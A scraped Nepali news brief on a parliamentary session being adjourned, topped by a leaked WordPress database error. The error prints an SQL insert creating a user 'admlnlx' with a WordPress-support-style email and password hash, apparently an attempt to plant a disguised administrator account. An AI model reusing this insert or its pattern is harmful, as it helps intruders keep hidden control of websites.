WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bs1Y9iUxtlYXUoL1/2EiYk.SSk/GGz.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 00:39:50', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ ७ –
व्यवस्थापिका संसद्को बैठक ३ दिनपछि बस्नेगरी स्थगित भएको छ। शुक्रबार बसेको बैठकमा विकास समितिका सभापति रविन्द्र अधिकारीले विकास समितिको अनुगमन एवंम् मुल्याङन प्रतिवेदन २०७३ सदन समक्ष पेश गरेका थिए। त्यसैगरी, उपप्रधानमन्त्री एवंम् अर्थमन्त्री कृष्ण्बहादुर महाराले पेश गरेको बोनस पाँचौ संशोधन विधेयक २०७३ अनुमति माग्ने प्रस्ताव सदनले पास गर्यो। बैठक अब माघ १० गते बस्नेछ।